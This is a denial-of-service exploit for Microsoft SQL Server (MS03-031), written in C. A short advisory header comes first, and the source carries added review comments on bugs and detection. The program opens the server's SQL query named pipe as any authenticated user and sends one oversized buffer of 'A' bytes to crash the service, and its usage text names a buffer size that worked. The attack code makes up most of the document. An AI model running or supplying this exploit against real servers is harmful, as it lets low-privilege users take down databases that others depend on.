
source: https://www.securityfocus.com/bid/8274/info
Microsoft SQL Server and the Microsoft Data Engine have been reported to be prone to a denial-of-service attack.
Any local or remote user who can authenticate and is part of the Everyone Group may trigger a denial-of-service condition in an affected SQL Server.
It has been reported that, if a remote attacker sends an unusually large request to a named pipe, the SQL Server will become unresponsive.
////////////////////////////////////////////////////////////////////////////////
//
// exp for Microsoft SQL Server DoS(MS03-031)
//
// By : refdom
// Email : refdom@xfocus.org
// Home Page : http://www.xfocus.org
//
////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
/* Print the tool banner and command-line help to stdout, one fixed line at
 * a time. Output is byte-identical to the original printf sequence; none of
 * the strings contain conversion specifiers, so fputs is equivalent. */
void Usage()
{
    static const char *const banner[] = {
        "******************************************\n",
        "exp for Microsoft SQL Server DoS(MS03-031)\n\n",
        "\t Written by Refdom\n",
        "\t Email: refdom@xfocus.org\n",
        "\t Homepage: www.xfocus.org\n\n",
        "Usage: DOSMSSQL.exe server buffersize\n",
        "eg: SQLScanner.exe 192.168.0.1 9000\n\n",
        "The buffersize depends on service pack level.\n",
        "I test it on my server: windows 2000, mssqlserver no sp.\n",
        "when buffersize is 9000, the server can be crashed.\n",
        "\n",
        "*******************************************\n\n",
    };
    size_t line;

    for (line = 0; line < sizeof banner / sizeof banner[0]; line++) {
        fputs(banner[line], stdout);
    }
}
/*
 * Entry point of the MS03-031 SQL Server named-pipe DoS proof of concept.
 *
 * argv[1] is the server name (fewer than 20 characters), argv[2] the decimal
 * size of the payload written to the server's SQL named pipe. Every failure
 * path jumps to Exit0 and the process always exits 0, so the exit status
 * carries no information about what happened.
 *
 * NOTE(review): lpBuffer is never free()d and hPipe is never CloseHandle()d;
 * harmless for a one-shot process, but worth knowing when reading the flow.
 * NOTE(review): GetLastError() returns a DWORD, so the "%d" specifiers used
 * below are the wrong conversion ("%lu" would match).
 */
int main(int argc, char* argv[])
{
    char lpPipeName[50];        /* pipe path built by the sprintf below */
    char *lpBuffer = NULL;      /* heap payload of ulSize + 2 bytes */
    unsigned long ulSize = 0;   /* payload size taken from argv[2] */

    BOOL bResult;
    DWORD dwWritten = 0, dwMode;
    HANDLE hPipe;

    Usage();

    printf("Starting...\n");

    if (argc != 3)
        goto Exit0;

    /* The 20-character bound keeps the sprintf inside lpPipeName[50]: the
     * fixed part of the format is 20 characters, so the result is at most
     * 39 characters plus the terminator. */
    if (strlen(argv[1]) < 20)
    {
        sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
    }
    else
    {
        printf("Error!server\n");
        goto Exit0;
    }

    /* NOTE(review): atol() does no error reporting; a non-numeric argv[2]
     * yields 0 and a negative one becomes a huge unsigned value, so the
     * ulSize + 2 below can wrap. */
    ulSize= atol(argv[2]);

    lpBuffer = (char*)malloc(ulSize + 2);
    if (NULL == lpBuffer)
    {
        printf("malloc error!\n");
        goto Exit0;
    }

    /* Payload: ulSize bytes of 'A' followed by two zero bytes, with the first
     * three bytes then overwritten with 0x12 0x01 0x00. Presumably these
     * mimic a TDS packet header -- not verifiable from this file. */
    memset(lpBuffer, 0, ulSize + 2);
    memset(lpBuffer, 'A', ulSize);
    *lpBuffer = '\x12';
    *(lpBuffer + 1) = '\x01';
    *(lpBuffer + 2) = '\x00';

    printf("Connecting Server...\n");

    /* Open the remote pipe for read/write. Per the advisory above, any
     * authenticated member of the Everyone Group can reach it, which is what
     * makes this a low-privilege denial of service. */
    hPipe = CreateFile(lpPipeName,
                       GENERIC_READ | GENERIC_WRITE,
                       0,
                       NULL,
                       OPEN_EXISTING,
                       0,
                       NULL);
    if (INVALID_HANDLE_VALUE == hPipe)
    {
        printf("Error!Connect server!%d\n", GetLastError());
        goto Exit0;
    }

    /* Put the client handle into message read mode; the maximum-bytes and
     * maximum-time settings are left untouched (the two NULLs). */
    dwMode = PIPE_READMODE_MESSAGE;
    bResult = SetNamedPipeHandleState(
        hPipe,    // pipe handle
        &dwMode,  // new pipe mode
        NULL,     // don't set maximum bytes
        NULL);    // don't set maximum time
    if (!bResult)
    {
        printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
        goto Exit0;
    }

    /* A single write of ulSize + 1 bytes (the last zero byte of the buffer is
     * never sent). A failed write is treated as the sign that the server has
     * stopped responding. From a detection standpoint, the observable
     * footprint is one oversized write to the SQL named pipe from an
     * authenticated, unprivileged account. */
    bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);

    if (!bResult)
    {
        printf("\n\tError!WriteFile.%d\n\n", GetLastError());
        printf("When see the error message, the target may be crashed!!\n\n");
        goto Exit0;
    }

Exit0:

    return 0;
}